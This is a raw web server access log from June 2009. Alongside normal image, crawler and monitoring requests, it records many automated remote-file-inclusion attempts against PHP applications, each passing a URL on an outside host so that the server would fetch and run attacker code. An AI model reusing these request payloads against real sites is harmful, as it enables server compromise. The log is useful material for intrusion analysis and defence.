76.114.150.150 - - [12/Jun/2009:01:01:44 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:44 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:44 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/items/ALLOOSS1_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/items/ALLOOSS2_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/next.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:45 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
66.235.124.14 - - [12/Jun/2009:01:02:21 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.14 - - [12/Jun/2009:01:02:51 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
192.114.71.150 - - [12/Jun/2009:01:02:58 -0400] "GET /scripts/browser_ie.js//?id=http://www.popco.net/shop/escrow/fumachuidsec.txt%0D?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
192.114.71.150 - - [12/Jun/2009:01:03:00 -0400] "GET /scripts//?id=http://www.popco.net/shop/escrow/fumachuidsec.txt%0D?? HTTP/1.1" 200 810 "-" "libwww-perl/5.805"
192.114.71.150 - - [12/Jun/2009:01:03:00 -0400] "GET //?id=http://www.popco.net/shop/escrow/fumachuidsec.txt%0D?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
77.234.200.238 - - [12/Jun/2009:01:03:04 -0400] "GET /logs/access_log.Q109060800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.825"
77.234.200.238 - - [12/Jun/2009:01:03:05 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.825"
77.234.200.238 - - [12/Jun/2009:01:03:05 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.825"
222.231.1.113 - - [12/Jun/2009:01:04:01 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.231.1.113 - - [12/Jun/2009:01:04:06 -0400] "GET /logs/access_log.Q109053100///vwar/backup/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.85.165.10 - - [12/Jun/2009:01:04:12 -0400] "GET /logs/access_log.Q109052400/ncaster/admin/addons/archive/archive.php?adminfolder=http://208.98.22.241/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:04:12 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://208.98.22.241/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:04:12 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://208.98.22.241/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:04:16 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://208.98.22.241/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:04:16 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://208.98.22.241/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:04:16 -0400] "GET /logs/access_log.Q109052400/ncaster/admin/addons/archive/archive.php?adminfolder=http://208.98.22.241/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:04:46 -0400] "GET /logs/access_log.Q109052900/ncaster/admin/addons/archive/archive.php?adminfolder=http://208.98.22.241/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:04:46 -0400] "GET /logs/access_log.Q109052900/ncaster/admin/addons/archive/archive.php?adminfolder=http://208.98.22.241/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.811"
66.249.71.54 - - [12/Jun/2009:01:05:05 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0065594499912500D1CE01I+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [12/Jun/2009:01:05:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.18.204.152 - - [12/Jun/2009:01:05:49 -0400] "GET /logs/access_log.Q109052500//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.18.204.152 - - [12/Jun/2009:01:05:49 -0400] "GET //blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.18.204.152 - - [12/Jun/2009:01:05:49 -0400] "GET /logs//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 226 "-" "Mozilla/5.0"
77.234.200.238 - - [12/Jun/2009:01:05:54 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.825"
70.85.249.226 - - [12/Jun/2009:01:07:09 -0400] "GET //?id=http://www.popco.net/shop/escrow/fumachuidsec.txt???? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
70.85.249.226 - - [12/Jun/2009:01:07:09 -0400] "GET /scripts/browser_ie.js//?id=http://www.popco.net/shop/escrow/fumachuidsec.txt???? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
70.85.249.226 - - [12/Jun/2009:01:07:09 -0400] "GET /scripts//?id=http://www.popco.net/shop/escrow/fumachuidsec.txt???? HTTP/1.1" 200 810 "-" "libwww-perl/5.805"
218.249.36.194 - - [12/Jun/2009:01:07:33 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:01:07:33 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:01:07:33 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:01:07:34 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:01:07:34 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:01:07:34 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.231.1.113 - - [12/Jun/2009:01:07:49 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.231.1.113 - - [12/Jun/2009:01:07:49 -0400] "GET /logs/access_log.Q109053100///vwar/backup/errors.php?error=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
67.18.204.152 - - [12/Jun/2009:01:07:58 -0400] "GET /logs/access_log.Q109052500//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.18.204.152 - - [12/Jun/2009:01:07:58 -0400] "GET //blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.18.204.152 - - [12/Jun/2009:01:07:58 -0400] "GET /logs//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.19.26.122 - - [12/Jun/2009:01:08:08 -0400] "GET /logs/error_log.Q109052500//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.19.26.122 - - [12/Jun/2009:01:08:08 -0400] "GET //blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.19.26.122 - - [12/Jun/2009:01:08:08 -0400] "GET /logs//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 226 "-" "Mozilla/5.0"
70.85.165.10 - - [12/Jun/2009:01:08:22 -0400] "GET /config.php?path_to_root=http://208.98.22.241/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:08:22 -0400] "GET /logs/config.php?path_to_root=http://208.98.22.241/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:08:22 -0400] "GET /logs/access_log.Q109053000/config.php?path_to_root=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:08:54 -0400] "GET /logs/access_log.Q109052900/config.php?path_to_root=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
64.59.71.64 - - [12/Jun/2009:01:09:06 -0400] "GET /logs/access_log.Q109052500//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.59.71.64 - - [12/Jun/2009:01:09:06 -0400] "GET //blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/5.0"
64.59.71.64 - - [12/Jun/2009:01:09:06 -0400] "GET /logs//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 226 "-" "Mozilla/5.0"
70.85.165.10 - - [12/Jun/2009:01:09:09 -0400] "GET /logs/access_log.Q109060500//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:09:09 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:01:09:09 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.811"
91.121.23.156 - - [12/Jun/2009:01:09:17 -0400] "GET /logs/access_log.Q109053100/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:01:09:17 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:01:09:17 -0400] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.813"
76.164.212.18 - - [12/Jun/2009:01:09:28 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
76.164.212.18 - - [12/Jun/2009:01:09:28 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
76.164.212.18 - - [12/Jun/2009:01:09:28 -0400] "GET /logs/access_log.Q109060500/lostpasswd.php?env[include_prefix]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
81.248.63.177 - - [12/Jun/2009:01:09:31 -0400] "GET /logs/access_log.Q109053000/joomla/index.php?option=com_restaurante&task=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:01:10:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
76.164.212.18 - - [12/Jun/2009:01:10:43 -0400] "GET /logs/access_log.Q109060500%20%20/lostpasswd.php?env[include_prefix]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
76.164.212.18 - - [12/Jun/2009:01:11:54 -0400] "GET /logs/access_log.Q109052900%20%20/lostpasswd.php?env[include_prefix]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.18.204.152 - - [12/Jun/2009:01:11:55 -0400] "GET /logs/error_log.Q109052500//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.75.9.13 - - [12/Jun/2009:01:12:10 -0400] "GET /logs/access_log.Q109052500//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.75.9.13 - - [12/Jun/2009:01:12:11 -0400] "GET //blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/5.0"
216.75.9.13 - - [12/Jun/2009:01:12:11 -0400] "GET /logs//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.125.38.117 - - [12/Jun/2009:01:12:13 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
217.125.38.117 - - [12/Jun/2009:01:12:14 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
217.125.38.117 - - [12/Jun/2009:01:12:15 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:01:13:08 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "-" "Googlebot-Image/1.0"
91.121.23.156 - - [12/Jun/2009:01:13:12 -0400] "GET /logs/access_log.Q109052400/components/com_smf/smf.php?mosConfig_absolute_path=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:01:13:12 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.813"
91.121.23.156 - - [12/Jun/2009:01:13:12 -0400] "GET /logs/components/com_smf/smf.php?mosConfig_absolute_path=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.813"
69.48.211.205 - - [12/Jun/2009:01:13:15 -0400] "GET /logs/access_log.Q109052500//xmlsrv/xmlrpc.php HTTP/1.1" 404 243 "-" "Mozilla/5.0"
69.48.211.205 - - [12/Jun/2009:01:13:16 -0400] "GET //xmlsrv/xmlrpc.php HTTP/1.1" 404 216 "-" "Mozilla/5.0"
69.48.211.205 - - [12/Jun/2009:01:13:16 -0400] "GET /logs//xmlsrv/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/5.0"
70.85.165.10 - - [12/Jun/2009:01:13:27 -0400] "GET /logs/access_log.Q109052900//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.811"
67.18.204.152 - - [12/Jun/2009:01:13:46 -0400] "GET /logs/error_log.Q109052500//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 247 "-" "Mozilla/5.0"
213.149.105.23 - - [12/Jun/2009:01:14:15 -0400] "GET /logs/access_log.Q109051100/forum.php?act=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
213.149.105.23 - - [12/Jun/2009:01:14:15 -0400] "GET /logs/forum.php?act=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
213.149.105.23 - - [12/Jun/2009:01:14:15 -0400] "GET /forum.php?act=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
213.149.105.23 - - [12/Jun/2009:01:14:17 -0400] "GET /logs/access_log.Q109060500/forum.php?act=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
91.121.23.156 - - [12/Jun/2009:01:15:02 -0400] "GET /logs/access_log.Q109050900/components/com_smf/smf.php?mosConfig_absolute_path=http://200.58.113.248/trac-juegos.com.ar/cms///administrator/components/com_virtuemart/id.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.813"
216.119.103.12 - - [12/Jun/2009:01:15:14 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://www.cjmc.or.kr/data/board/idscan.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.119.103.12 - - [12/Jun/2009:01:15:14 -0400] "GET /errors.php?error=http://www.cjmc.or.kr/data/board/idscan.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
216.119.103.12 - - [12/Jun/2009:01:15:14 -0400] "GET /logs/errors.php?error=http://www.cjmc.or.kr/data/board/idscan.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
209.59.12.99 - - [12/Jun/2009:01:15:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
